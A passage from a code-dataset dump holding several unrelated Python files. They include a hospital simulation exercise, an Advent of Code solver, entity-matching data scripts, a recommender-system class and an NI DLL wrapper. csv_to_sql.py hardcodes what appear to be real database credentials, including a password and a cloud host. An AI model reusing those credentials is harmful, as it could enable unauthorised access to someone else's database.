'diarrea'])\npaciente4 = t.Paciente('888A', 'Inma', 'Luque', ['dolor garganta', 'dolor cabeza'])\n\nconsulta1 = t.Consulta('1')\nconsulta2 = t.Consulta('2')\n# print(consulta1)\n# print(consulta2)\n# Los trabajadores creados entran a trabajar (fichan)\ndoctor1.fichar()\ndoctor2.fichar()\nenfermero1.fichar()\nenfermero2.fichar()\n# print(doctor1)\n# print(doctor2)\n# print(enfermero1)\n# print(enfermero2)\nconsulta1.add_doctor(doctor1)\nconsulta2.add_doctor(doctor2)\n# print(consulta1)\n# print(consulta2)\n\nsala_espera = [paciente1, paciente2, paciente3, paciente4]\nenfermos_en_habitacion = []\nenfermos_en_pasillo = []\nlista_enfermeros = [enfermero1, enfermero2]\nlista_consultas = [consulta1, consulta2]\n\n# Aquí empieza el proceso de tratar pacientes\nturno_enfermero = 0\nwhile len(sala_espera) > 0:\n print('========Empieza la colsulta===========')\n esta_enfermo = True\n # El enfermero correspondiente atiende al paciente (le manda a la consulta correspondiente)\n lista_enfermeros[turno_enfermero % 2].atender_paciente(sala_espera, lista_consultas[turno_enfermero % 2])\n # Comprobamos que haya un doctor en la consulta y este le diagnostica\n if lista_consultas[turno_enfermero % 2].doctor is not None:\n esta_enfermo, enfermedad = lista_consultas[turno_enfermero % 2].doctor.diagnosticar(\n lista_consultas[turno_enfermero % 2].paciente)\n # Creamos un enfermo (puede ser un cuentista)\n enfermo = t.Enfermo(enfermedad, lista_consultas[turno_enfermero % 2].paciente.dni,\n lista_consultas[turno_enfermero % 2].paciente.nombre,\n lista_consultas[turno_enfermero % 2].paciente.apellido,\n lista_consultas[turno_enfermero % 2].paciente.sintomas)\n # Aquí decidimos si le mandamos a la habitación, al pasillo o a su casa\n if esta_enfermo and len(enfermos_en_habitacion) < 3:\n print('Dirijase a la habitación, {}. Usted tiene {}.'.format(\n lista_consultas[turno_enfermero % 2].paciente.nombre, enfermedad))\n enfermos_en_habitacion.append(enfermo)\n elif not esta_enfermo:\n print('No me haga perder mi valioso tiempo, {}. Usted tiene {}.'.format(\n lista_consultas[turno_enfermero % 2].paciente.nombre, enfermedad))\n else:\n print(\n '{}, usted tiene {}. Lo siento pero le van a dejar temporalmente el pasillo. Este es el estado de la '\n 'sanidad pública en Madrid.'.format(\n lista_consultas[turno_enfermero % 2].paciente.nombre, enfermedad))\n enfermos_en_pasillo.append(enfermo)\n # Aquí el paciente sale de la consulta\n print(consulta1)\n print(consulta2)\n lista_consultas[turno_enfermero % 2].despachar_paciente()\n else:\n print('La consulta {} está vacía. Llamen a un doctor ahora mismo, el paciente {} le está esperando'.format(\n lista_consultas[turno_enfermero % 2].id_number, lista_consultas[turno_enfermero % 2].paciente.nombre))\n turno_enfermero += 1\n print('========Termina la colsulta===========')\n # print(consulta1)\n # print(consulta2)\n # print(esta_enfermo)\n # print(consulta1)\n # print(consulta2)\n # print(len(sala_espera))\n # print(sala_espera)\n\nconsulta1.salir_doctor()\nconsulta2.salir_doctor()\nenfermero1.fichar()\nenfermero2.fichar()\n\nprint('\\nLa sala de espera tiene {} paciente'.format(len(sala_espera)))\nprint('\\nEn la habitación están los siguientes pacientes:')\nfor enfermo in enfermos_en_habitacion:\n print(enfermo)\n\nif len(enfermos_en_pasillo) > 0:\n print('\\nEn el pasillo están los siguientes pacientes:')\n for enfermo in enfermos_en_pasillo:\n print(enfermo)\nelse:\n print('\\nEn el pasillo no hay pacientes')\n","repo_name":"lanadongonzalez/PyCharm-curso-Ibertech","sub_path":"Hospital separando clases/Ejercicio 8 Hospital.py","file_name":"Ejercicio 8 Hospital.py","file_ext":"py","file_size_in_byte":4571,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"160916567","text":"data = open(\"../input/day-5.txt\", \"r\")\n\nstacks = []\nstack_lines = []\n# First convert the raw table into a list of lists, then we can convert\n# to a list of stacks to make it easier to work with.\nfor i in range(0, 8):\n line = data.readline()\n columns = []\n # 36 chars per line, 4 chars per column\n for j in range(0, 36, 4):\n chars = line[j:j + 4]\n chars = chars.translate({ord(c): None for c in '[]'}).strip()\n columns.append(chars if chars != \"\" else None)\n stack_lines.append(columns)\n\ndata.readline() # Skip the column labels\ndata.readline() # Skip the empty line\n\n# Now convert the raw table into a list of stacks.\nfor col in range(0, 9):\n stack = []\n for row in range(7, -1, -1):\n cell = stack_lines[row][col]\n if cell is not None:\n stack.append(cell)\n stacks.append(stack)\n\n\nwhile True:\n line = data.readline()\n if line == \"\":\n break\n # Instruction example: move 2 from 7 to 2\n instruction = line.split(\" \")\n (count, source, destination) = [int(x) for x in instruction if x.rstrip().isdigit()]\n for i in range(0, count):\n stacks[destination - 1].append(stacks[source - 1].pop())\ndata.close()\n\nprint(f\"Stacks: {stacks}\")\ntop_crates = [stack.pop() for stack in stacks]\nprint(f\"Top crates: {''.join(top_crates)}\")\n","repo_name":"joebutler2/advent-of-code-2022","sub_path":"src/day-5.py","file_name":"day-5.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"71877751461","text":"'''\nCreated on Jan 31, 2019\n\n@author: hzhang0418\n'''\n\n'''\nProcess datasets from Han\n'''\n\nimport os\n\nimport py_entitymatching as em\n\nimport v3.feature_generation as fg\n\nimport utils.mycsv\nimport utils.myconfig\n\ndef process(basedir):\n \n pass\n\ndef prepare_labeled_data(basedir):\n \n train_file = os.path.join(basedir, 'train.csv')\n valid_file = os.path.join(basedir, 'valid.csv')\n test_file = os.path.join(basedir, 'test.csv')\n \n labeled_data = utils.mycsv.read_csv_as_list(train_file) \n labeled_data.extend( utils.mycsv.read_csv_as_list(valid_file) )\n labeled_data.extend( utils.mycsv.read_csv_as_list(test_file) )\n \n print(len(labeled_data))\n print(labeled_data[0])\n \n for i, data in enumerate(labeled_data, 1):\n data['_id'] = i\n data['label'] = data['gold']\n data['ltable.id'] = data['ltable_id']\n data['rtable.id'] = data['rtable_id']\n \n fieldnames = ['_id', 'ltable.id', 'rtable.id', 'label']\n \n output_file = 'labeled_data.csv'\n utils.mycsv.write_list_to_csv(labeled_data, fieldnames, os.path.join(basedir, output_file))\n \ndef prepare_features(config_file):\n params = utils.myconfig.read_config(config_file)\n fg.generate_features(params)\n \n \ndef test():\n basedir = r'/scratch/hzhang0418/Datasets from Han/Clothing'\n basedir = r'/scratch/hzhang0418/Datasets from Han/Home'\n basedir = r'/scratch/hzhang0418/Datasets from Han/Electronics'\n basedir = r'/scratch/hzhang0418/Datasets from Han/Tools'\n prepare_labeled_data(basedir)\n \n \ndef test2():\n config_file = r'/scratch/hzhang0418/projects/datasets/mono2019/clothing.config'\n config_file = r'/scratch/hzhang0418/projects/datasets/mono2019/home.config'\n config_file = r'/scratch/hzhang0418/projects/datasets/mono2019/electronics.config'\n config_file = r'/scratch/hzhang0418/projects/datasets/mono2019/tools.config'\n \n config_file = r'/scratch/hzhang0418/projects/datasets/mono2019/trunc_clothing.config'\n #config_file = r'/scratch/hzhang0418/projects/datasets/mono2019/trunc_home.config'\n #config_file = r'/scratch/hzhang0418/projects/datasets/mono2019/trunc_electronics.config'\n #config_file = r'/scratch/hzhang0418/projects/datasets/mono2019/trunc_tools.config'\n \n prepare_features(config_file)\n \n \ndef find_attributes_to_drop(table_A, table_B, perc = 0.1):\n \n attr_to_drop = set()\n \n size = len(table_A)\n for col in table_A:\n num_null = table_A[col].isnull().sum()\n if num_null>=size*perc:\n attr_to_drop.add(col)\n \n size = len(table_B)\n for col in table_B:\n num_null = table_B[col].isnull().sum()\n if num_null>=size*perc:\n attr_to_drop.add(col) \n \n return list(attr_to_drop)\n \ndef test3():\n config_file = r'/scratch/hzhang0418/projects/datasets/mono2019/clothing.config'\n config_file = r'/scratch/hzhang0418/projects/datasets/mono2019/home.config'\n config_file = r'/scratch/hzhang0418/projects/datasets/mono2019/electronics.config'\n config_file = r'/scratch/hzhang0418/projects/datasets/mono2019/tools.config'\n \n # read config\n params = utils.myconfig.read_config(config_file)\n # base dir\n basedir = params['basedir']\n # path for table A, B, G, H\n apath = os.path.join(basedir, params['apath'])\n bpath = os.path.join(basedir, params['bpath'])\n \n table_A = em.read_csv_metadata(apath, key='id')\n table_B = em.read_csv_metadata(bpath, key='id') \n \n\n attr_to_drop = find_attributes_to_drop(table_A, table_B, 0.05)\n print(attr_to_drop)\n \n table_A.drop(columns=attr_to_drop, inplace=True)\n table_B.drop(columns=attr_to_drop, inplace=True)\n\n apath_new = os.path.join(basedir, r'trunc_'+params['apath'])\n bpath_new = os.path.join(basedir, r'trunc_'+params['bpath'])\n \n table_A.to_csv(apath_new, index=False)\n table_B.to_csv(bpath_new, index=False)\n \ndef test4():\n config_file = r'/scratch/hzhang0418/projects/datasets/mono2019/trunc_clothing.config'\n config_file = r'/scratch/hzhang0418/projects/datasets/mono2019/trunc_home.config'\n config_file = r'/scratch/hzhang0418/projects/datasets/mono2019/trunc_electronics.config'\n config_file = r'/scratch/hzhang0418/projects/datasets/mono2019/trunc_tools.config'\n \n # read config\n params = utils.myconfig.read_config(config_file)\n # base dir\n basedir = params['basedir']\n # path for table A, B, G, H\n apath = os.path.join(basedir, params['apath'])\n bpath = os.path.join(basedir, params['bpath'])\n gpath = os.path.join(basedir, params['gpath'])\n \n table_A = em.read_csv_metadata(apath, key='id')\n table_B = em.read_csv_metadata(bpath, key='id') \n \n table_A_missing_ids = set()\n for col in table_A:\n ids = set(table_A[table_A[col].isnull()]['id'].values)\n table_A_missing_ids.update(ids)\n \n table_B_missing_ids = set()\n for col in table_B:\n ids = set(table_B[table_B[col].isnull()]['id'].values)\n table_B_missing_ids.update(ids)\n \n print(len(table_A_missing_ids))\n print(len(table_B_missing_ids))\n \n tmp_A = table_A[~table_A['id'].isin(table_A_missing_ids)]\n tmp_B = table_B[~table_B['id'].isin(table_B_missing_ids)]\n \n table_G = em.read_csv_metadata(gpath, key='_id', ltable = table_A, rtable = table_B, fk_ltable='ltable.id', fk_rtable='rtable.id')\n tmp_G = table_G[ ~table_G['ltable.id'].isin(table_A_missing_ids)]\n tmp_G = tmp_G[~tmp_G['rtable.id'].isin(table_B_missing_ids)]\n print(len(table_G), len(tmp_G))\n \n tmp_A.to_csv(apath, index=False)\n tmp_B.to_csv(bpath, index=False)\n tmp_G.to_csv(gpath, index=False)\n \n \ndef merge(basedir):\n train_file = os.path.join(basedir, '_train_feat_vecs.csv')\n valid_file = os.path.join(basedir, '_valid_feat_vecs.csv')\n test_file = os.path.join(basedir, '_test_feat_vecs.csv')\n \n features = utils.mycsv.read_csv_as_list(train_file) \n features.extend( utils.mycsv.read_csv_as_list(valid_file) )\n features.extend( utils.mycsv.read_csv_as_list(test_file) )\n \n for k, f in enumerate(features):\n f['_id'] = k\n f['ltable.id'] = f['ltable_id']\n f['rtable.id'] = f['rtable_id']\n \n fieldnames = list(features[0].keys())\n fieldnames.remove('ltable_id')\n fieldnames.remove('rtable_id')\n \n output_file = 'feature_vector_tfidf.csv'\n utils.mycsv.write_list_to_csv(features, fieldnames, os.path.join(basedir, output_file))\n \ndef test5():\n basedir = r'/scratch/hzhang0418/temp_feat/Clothing'\n basedir = r'/scratch/hzhang0418/temp_feat/Home'\n basedir = r'/scratch/hzhang0418/temp_feat/Electronics'\n #basedir = r'/scratch/hzhang0418/temp_feat/Tools'\n \n merge(basedir)\n\n \n \n ","repo_name":"qcri/scrubber","sub_path":"src/v4/dataset_dl.py","file_name":"dataset_dl.py","file_ext":"py","file_size_in_byte":6790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"73030978339","text":"'''\nGordon Doore\n06/14/2023\ncsv_to_sql.py\nThis script provides a function for incrementing CSV IDs and \ninserting the updated data into a MySQL database table.\n'''\n\nimport csv\nimport mysql.connector\n\ndef increment_csv_ids(table_name, csv_file_path, db_config):\n # Establish a connection to the database\n cnx = mysql.connector.connect(**db_config)\n cursor = cnx.cursor()\n print(\"connection success\")\n # Step 1: Retrieve the maximum value of the id column from the table\n select_query = f\"SELECT MAX(id) FROM {table_name}\"\n cursor.execute(select_query)\n max_id = cursor.fetchone()[0]\n if max_id is None:\n max_id = -1\n print(\"max_id is\"+str(max_id))\n\n # Step 2: Read the CSV file and update the id column values\n updated_rows = []\n with open(csv_file_path, 'r') as file:\n csv_data = csv.reader(file)\n next(csv_data) # Skip the header row\n\n for row in csv_data:\n row[0] = int(row[0]) + max_id + 1 # Increment the id value\n updated_rows.append(row)\n\n # Step 3: Insert the updated data from the CSV into the table\n placeholders = ','.join(['%s'] * len(updated_rows[0]))\n insert_query = f\"INSERT INTO {table_name} VALUES ({placeholders})\"\n cursor.executemany(insert_query, updated_rows)\n\n # Commit the changes\n cnx.commit()\n print(\"committed\")\n # Close the cursor and connection\n cursor.close()\n cnx.close()\n\nif __name__ == \"__main__\":\n # Database credentials\n db = {\n 'user': 'doadmin',\n 'password': 'AVNS_UXdKjBYJzYULsF8uJnC',\n 'host': 'c3-database-do-user-914951-0.b.db.ondigitalocean.com',\n 'database': 'C3_Database',\n 'port': 25060\n }\n TABLE = 'C3Macro'\n CSV = 'test.csv'\n increment_csv_ids(TABLE,CSV,db)","repo_name":"coast-cow-consumer/Dairy-One-csv-sql-connect","sub_path":"csv_to_sql.py","file_name":"csv_to_sql.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"1013334527","text":"import markovify\nimport os\nimport nltk\nimport re\n\ndirname = os.path.dirname(os.path.abspath(__file__))\ntweets = os.path.join(dirname, 'tweets.txt')\n\nwith open(tweets) as f:\n text = f.read()\n\n\n\nclass POSifiedText(markovify.Text):\n def word_split(self, sentence):\n words = re.split(self.word_split_pattern, sentence)\n words = [ \"::\".join(tag) for tag in nltk.pos_tag(words) ]\n return words\n\n def word_join(self, words):\n sentence = \" \".join(word.split(\"::\")[0] for word in words)\n return sentence\n\n\ntext_model = markovify.Text(text)\n\nprint(text_model.make_short_sentence(280))","repo_name":"nuala-odonovan/anabot","sub_path":"anabot.py","file_name":"anabot.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"70052952102","text":"from .constants import T5_SPARQL_DECODINGS, T5_SPARQL_ENCODINGS\nfrom .utils import replace_multi\n\n\ndef remove_prefixes(text: str):\n # PREFIX prefix: \n while True:\n idx = text.find(\"PREFIX\")\n if idx < 0:\n break\n\n idx = text.find(\">\", idx)\n text = text[idx + 1 :]\n\n return text\n\n\ndef preprocess_sparql(text: str):\n text = remove_prefixes(text)\n text = replace_multi(text, T5_SPARQL_ENCODINGS)\n return text\n\n\ndef postprocess_sparql(text: str):\n text = replace_multi(text, T5_SPARQL_DECODINGS)\n return text\n","repo_name":"picas9dan/nl2sparql-webapp","sub_path":"marie_fastapi/services/translate/data_processing/sparql.py","file_name":"sparql.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"21647762352","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 07/09/17\n\n@author: Maurizio Ferrari Dacrema\n\"\"\"\n\nfrom SLIM_BPR2.Base.Recommender import Recommender\nfrom SLIM_BPR2.Base.Incremental_Training_Early_Stopping import Incremental_Training_Early_Stopping\nfrom SLIM_BPR2.Base.Evaluation.Evaluator import SequentialEvaluator\n\nimport subprocess\nimport os, sys\nimport time, pickle\nimport numpy as np\n\n\n\n\nclass MatrixFactorization_Cython(Recommender, Incremental_Training_Early_Stopping):\n\n RECOMMENDER_NAME = \"MatrixFactorization_Cython_Recommender\"\n\n\n def __init__(self, URM_train, positive_threshold=4, URM_validation = None, recompile_cython = False, algorithm = \"MF_BPR\"):\n\n\n super(MatrixFactorization_Cython, self).__init__()\n\n\n self.URM_train = URM_train\n self.n_users = URM_train.shape[0]\n self.n_items = URM_train.shape[1]\n self.normalize = False\n\n self.algorithm = algorithm\n\n self.positive_threshold = positive_threshold\n\n if URM_validation is not None:\n self.URM_validation = URM_validation.copy()\n else:\n self.URM_validation = None\n\n self.compute_item_score = self.compute_score_MF\n\n\n if recompile_cython:\n print(\"Compiling in Cython\")\n self.runCompilationScript()\n print(\"Compilation Complete\")\n\n\n\n def compute_score_MF(self, user_id):\n\n scores_array = np.dot(self.W[user_id], self.H.T)\n\n return scores_array\n\n\n\n\n def fit(self, epochs=300, batch_size = 1000, num_factors=10,\n learning_rate = 0.01, sgd_mode='sgd', user_reg = 0.0, positive_reg = 0.0, negative_reg = 0.0,\n stop_on_validation = False, lower_validatons_allowed = 5, validation_metric = \"MAP\",\n evaluator_object = None, validation_every_n = 5):\n\n\n\n self.num_factors = num_factors\n self.sgd_mode = sgd_mode\n self.batch_size = batch_size\n self.learning_rate = learning_rate\n\n if evaluator_object is None and stop_on_validation:\n evaluator_object = SequentialEvaluator(self.URM_validation, [5])\n\n\n # Import compiled module\n from MatrixFactorization.Cython.MatrixFactorization_Cython_Epoch import MatrixFactorization_Cython_Epoch\n\n\n if self.algorithm == \"FUNK_SVD\":\n\n\n self.cythonEpoch = MatrixFactorization_Cython_Epoch(self.URM_train,\n algorithm = self.algorithm,\n n_factors = self.num_factors,\n learning_rate = learning_rate,\n batch_size = 1,\n sgd_mode = sgd_mode,\n user_reg = user_reg,\n positive_reg = positive_reg,\n negative_reg = 0.0)\n\n elif self.algorithm == \"ASY_SVD\":\n\n\n self.cythonEpoch = MatrixFactorization_Cython_Epoch(self.URM_train,\n algorithm = self.algorithm,\n n_factors = self.num_factors,\n learning_rate = learning_rate,\n batch_size = 1,\n sgd_mode = sgd_mode,\n user_reg = user_reg,\n positive_reg = positive_reg,\n negative_reg = 0.0)\n\n elif self.algorithm == \"MF_BPR\":\n\n # Select only positive interactions\n URM_train_positive = self.URM_train.copy()\n\n URM_train_positive.data = URM_train_positive.data >= self.positive_threshold\n URM_train_positive.eliminate_zeros()\n\n assert URM_train_positive.nnz > 0, \"MatrixFactorization_Cython: URM_train_positive is empty, positive threshold is too high\"\n\n self.cythonEpoch = MatrixFactorization_Cython_Epoch(URM_train_positive,\n algorithm = self.algorithm,\n n_factors = self.num_factors,\n learning_rate=learning_rate,\n batch_size=1,\n sgd_mode = sgd_mode,\n user_reg=user_reg,\n positive_reg=positive_reg,\n negative_reg=negative_reg)\n\n\n\n\n\n\n self._train_with_early_stopping(epochs, validation_every_n, stop_on_validation,\n validation_metric, lower_validatons_allowed, evaluator_object,\n algorithm_name = self.algorithm)\n\n\n\n\n\n self.W = self.W_best\n self.H = self.H_best\n\n sys.stdout.flush()\n\n\n\n\n\n\n def _initialize_incremental_model(self):\n\n self.W_incremental = self.cythonEpoch.get_W()\n self.W_best = self.W_incremental.copy()\n\n self.H_incremental = self.cythonEpoch.get_H()\n self.H_best = self.H_incremental.copy()\n\n\n\n def _update_incremental_model(self):\n\n self.W_incremental = self.cythonEpoch.get_W()\n self.H_incremental = self.cythonEpoch.get_H()\n\n self.W = self.W_incremental\n self.H = self.H_incremental\n\n\n def _update_best_model(self):\n\n self.W_best = self.W_incremental.copy()\n self.H_best = self.H_incremental.copy()\n\n\n\n def _run_epoch(self, num_epoch):\n self.cythonEpoch.epochIteration_Cython()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n def runCompilationScript(self):\n\n # Run compile script setting the working directory to ensure the compiled file are contained in the\n # appropriate subfolder and not the project root\n\n compiledModuleSubfolder = \"/MatrixFactorization/Cython\"\n fileToCompile_list = ['MatrixFactorization_Cython_Epoch.pyx']\n\n for fileToCompile in fileToCompile_list:\n\n command = ['python',\n 'compileCython.py',\n fileToCompile,\n 'build_ext',\n '--inplace'\n ]\n\n\n output = subprocess.check_output(' '.join(command), shell=True, cwd=os.getcwd() + compiledModuleSubfolder)\n\n try:\n\n command = ['cython',\n fileToCompile,\n '-a'\n ]\n\n output = subprocess.check_output(' '.join(command), shell=True, cwd=os.getcwd() + compiledModuleSubfolder)\n\n except:\n pass\n\n\n print(\"Compiled module saved in subfolder: {}\".format(compiledModuleSubfolder))\n\n # Command to run compilation script\n # python compileCython.py MatrixFactorization_Cython_Epoch.pyx build_ext --inplace\n\n # Command to generate html report\n # cython -a MatrixFactorization_Cython_Epoch.pyx\n\n\n\n\n\n\n def writeCurrentConfig(self, currentEpoch, results_run, logFile):\n\n current_config = {'learn_rate': self.learning_rate,\n 'num_factors': self.num_factors,\n 'batch_size': 1,\n 'epoch': currentEpoch}\n\n print(\"Test case: {}\\nResults {}\\n\".format(current_config, results_run))\n\n sys.stdout.flush()\n\n if (logFile != None):\n logFile.write(\"Test case: {}, Results {}\\n\".format(current_config, results_run))\n logFile.flush()\n\n\n\n\n\n\n def saveModel(self, folder_path, file_name = None):\n\n if file_name is None:\n file_name = self.RECOMMENDER_NAME\n\n print(\"{}: Saving model in file '{}'\".format(self.RECOMMENDER_NAME, folder_path + file_name))\n\n dictionary_to_save = {\"W\": self.W,\n \"H\": self.H}\n\n\n pickle.dump(dictionary_to_save,\n open(folder_path + file_name, \"wb\"),\n protocol=pickle.HIGHEST_PROTOCOL)\n\n\n print(\"{}: Saving complete\")\n\n\n\n\n\n\n\nclass MatrixFactorization_BPR_Cython(MatrixFactorization_Cython):\n \"\"\"\n Subclas allowing only for MF BPR\n \"\"\"\n\n RECOMMENDER_NAME = \"MatrixFactorization_BPR_Cython_Recommender\"\n\n def __init__(self, *pos_args, **key_args):\n super(MatrixFactorization_BPR_Cython, self).__init__(*pos_args, algorithm=\"MF_BPR\", **key_args)\n\n def fit(self, **key_args):\n super(MatrixFactorization_BPR_Cython, self).fit(**key_args)\n\n\n\n\n\nclass MatrixFactorization_FunkSVD_Cython(MatrixFactorization_Cython):\n \"\"\"\n Subclas allowing only for FunkSVD\n \"\"\"\n\n RECOMMENDER_NAME = \"MatrixFactorization_FunkSVD_Cython_Recommender\"\n\n def __init__(self, *pos_args, **key_args):\n super(MatrixFactorization_FunkSVD_Cython, self).__init__(*pos_args, algorithm=\"FUNK_SVD\", **key_args)\n\n\n def fit(self, **key_args):\n\n if \"reg\" in key_args:\n key_args[\"positive_reg\"] = key_args[\"reg\"]\n del key_args[\"reg\"]\n\n super(MatrixFactorization_FunkSVD_Cython, self).fit(**key_args)\n\n\n\n\nclass MatrixFactorization_AsySVD_Cython(MatrixFactorization_Cython):\n \"\"\"\n Subclas allowing only for AsySVD\n \"\"\"\n\n RECOMMENDER_NAME = \"MatrixFactorization_AsySVD_Cython_Recommender\"\n\n def __init__(self, *pos_args, **key_args):\n super(MatrixFactorization_AsySVD_Cython, self).__init__(*pos_args, algorithm=\"ASY_SVD\", **key_args)\n\n def fit(self, **key_args):\n super(MatrixFactorization_AsySVD_Cython, self).fit(**key_args)\n","repo_name":"vittorio96/RecSys","sub_path":"MatrixFactorization/Cython/MatrixFactorization_Cython.py","file_name":"MatrixFactorization_Cython.py","file_ext":"py","file_size_in_byte":9883,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"35"} +{"seq_id":"29860466734","text":"import openpyxl\n\ndef create_new_sheet(workbook, filename, sheet_name):\n\n # Create a new sheet with the specified name\n workbook.create_sheet(title=sheet_name)\n\n # Save the workbook to the specified filename\n workbook.save(filename)\n\nif __name__ == \"__main__\":\n filename = \"Hasil/Hasil.xlsx\" # Replace with the desired filename\n sheet_1 = \"Normal\"\n sheet_2 = \"Autis\" # Replace with the desired sheet name\n \n # Create a new Excel workbook\n workbook = openpyxl.Workbook()\n # Remove the default sheet created by openpyxl (Sheet)\n default_sheet = workbook.active\n workbook.remove(default_sheet)\n\n create_new_sheet(workbook, filename, sheet_1)\n create_new_sheet(workbook, filename, sheet_2)\n","repo_name":"RobyRAX/Pupil_Detection","sub_path":"InitiateFile.py","file_name":"InitiateFile.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"13001472861","text":"\"\"\"\nThis module has some convenience classes and functions for wrapping NI C API\ncalls. Modeled after the DLL calls in the NIMI-python library, see e.g.\nhttps://github.com/ni/nimi-python/blob/master/generated/nitclk/nitclk/_library.py\n\"\"\"\n\nimport ctypes\nfrom ctypes import POINTER\nfrom typing import NamedTuple, Optional, List, Any, Callable\nimport warnings\nfrom dataclasses import dataclass\nfrom .visa_types import (\n ViChar, ViStatus, ViRsrc, ViInt32, ViString, ViSession, ViBoolean, ViAttr,\n ViChar, ViReal64, VI_NULL\n)\n\n# 256 bytes should be enough, according to the documentation\nSTRING_BUFFER_SIZE = 257\n\n\ndef c_str(s: str) -> bytes: return bytes(s, \"ascii\")\n\n\n@dataclass\nclass AttributeWrapper(object):\n \"\"\"\n Struct to associate a data type to a numeric constant (i.e. attribute)\n defined in a NI DLL library. ``dtype`` should be one of the types defined\n in the ``visa_types`` module. Here, ``value`` means the same as the\n attributeID in the DLL documentation.\n \"\"\"\n value: ViAttr\n dtype: Any\n\n\nclass NamedArgType(NamedTuple):\n \"\"\"\n Struct for associating a name with an argument type for DLL function\n signatures.\n \"\"\"\n name: str\n argtype: Any\n\n\nclass NIDLLWrapper(object):\n \"\"\"\n This class provides convenience functions for wrapping and checking a DLL\n function call, as well as some premade pythonic wrapper functinos for\n common library functions such as libName_error_message, libName_init/close\n and libName_GetAttribute (e.g. niRFSG_init or niSync_init). Other functions\n should be wrapped by a library-specific class by calling\n ``wrap_dll_function_checked``. See the NI_RFSG driver for a concrete\n example.\n\n Args:\n dll_path: path to the DLL file containing the library\n lib_prefix: All function names in the library start with this. For\n example, for NI-RFSG, where function names are of the form\n niRFSG_FunctionName, ``lib_prefix`` should be 'niRFSG'.\n \"\"\"\n\n def __init__(self, dll_path: str, lib_prefix: str):\n self._dll = ctypes.cdll.LoadLibrary(dll_path)\n self._lib_prefix = lib_prefix\n\n self._dtype_map = {\n ViBoolean: \"ViBoolean\",\n ViInt32: \"ViInt32\",\n ViReal64: \"ViReal64\",\n ViString: \"ViString\"\n }\n\n # wrap standard functions that are the same in all libraries\n\n # note: self.error_messsage is a convenience wrapper around this, with\n # a different signature\n self._error_message = self.wrap_dll_function(\n name_in_library=\"error_message\",\n argtypes=[\n NamedArgType(\"vi\", ViSession),\n NamedArgType(\"errorCode\", ViStatus),\n NamedArgType(\"errorMessage\", POINTER(ViChar)),\n ]\n )\n\n # this is wrapped in self.init with a different signature\n self._init = self.wrap_dll_function_checked(\n name_in_library=\"init\",\n argtypes=[\n NamedArgType(\"resourceName\", ViRsrc),\n NamedArgType(\"idQuery\", ViBoolean),\n NamedArgType(\"resetDevice\", ViBoolean),\n ]\n )\n\n # no special name is needed, the signature is the same\n self.reset = self.wrap_dll_function_checked(\n name_in_library=\"reset\",\n argtypes=[NamedArgType(\"vi\", ViSession)]\n )\n\n self.close = self.wrap_dll_function_checked(\n name_in_library=\"close\",\n argtypes=[NamedArgType(\"vi\", ViSession)]\n )\n\n # wrap GetAttribute functions (see get_attribute method)\n for dtype, dtype_name in self._dtype_map.items():\n\n # argtypes for the GetAttribute functions\n getter_argtypes = [\n NamedArgType(\"vi\", ViSession),\n NamedArgType(\"channelName\", ViString),\n NamedArgType(\"attributeID\", ViAttr),\n NamedArgType(\"attributeValue\", POINTER(dtype))\n ]\n\n # the argtypes for the corresponding SetAttribute\n # functions. note that the signature for SetAttributeViString is\n # the same as for the other types even though GetAttributeViString\n # has a unique signature\n setter_argtypes = getter_argtypes.copy()\n\n if dtype == ViString:\n # replace last argument\n getter_argtypes.pop()\n getter_argtypes.append(NamedArgType(\"bufferSize\", ViInt32))\n # ViString is already a pointer, so no POINTER() here\n getter_argtypes.append(NamedArgType(\"attributeValue\", dtype))\n\n getter_name = f\"GetAttribute{dtype_name}\"\n getter_func = self.wrap_dll_function_checked(\n getter_name,\n argtypes=getter_argtypes)\n setattr(self, getter_name, getter_func)\n\n setter_argtypes[-1] = NamedArgType(\"attributeValue\", dtype)\n\n setter_name = f\"SetAttribute{dtype_name}\"\n setter_func = self.wrap_dll_function_checked(\n setter_name,\n argtypes=setter_argtypes)\n setattr(self, setter_name, setter_func)\n\n def wrap_dll_function(self, name_in_library: str,\n argtypes: List[NamedArgType],\n restype: Any = ViStatus,\n ) -> Any:\n \"\"\"\n Convenience method for wrapping a function in a NI C API.\n\n Args:\n name_in_library: The name of the function in the library (e.g.\n \"niRFSG_init\", or without the prefix, just \"init\")\n argtypes: list of ``NamedArgType`` tuples containing the names and\n types of the arguments of the function to be wrapped.\n restype: The return type of the library function (most likely\n ``ViStatus``).\n \"\"\"\n\n if not name_in_library.startswith(self._lib_prefix):\n name_in_library = f\"{self._lib_prefix}_{name_in_library}\"\n\n # TODO( mgunyho ): thread lock? (see nimi-python link at top of file)\n func = getattr(self._dll, name_in_library)\n func.restype = restype\n func.argtypes = [a.argtype for a in argtypes]\n func.argnames = [a.name for a in argtypes] # just in case\n\n return func\n\n def _check_error(self, error_code: int):\n \"\"\"\n If the error code is nonzero, convert it to a string using\n ``self.error_message`` and raise an exception or issue a warning as\n appropriate. ``self.error_message`` must be initialized with\n ``wrap_dll_function`` before this method can be used.\n \"\"\"\n if error_code != 0:\n msg = self.error_message(error_code=ViStatus(error_code))\n if error_code < 0:\n # negative error codes are errors\n raise RuntimeError(f\"({error_code}) {msg}\")\n else:\n warnings.warn(f\"({error_code}) {msg}\", RuntimeWarning,\n stacklevel=3)\n\n\n def wrap_dll_function_checked(self, name_in_library: str,\n argtypes: List[NamedArgType]) -> Callable:\n \"\"\"\n Same as 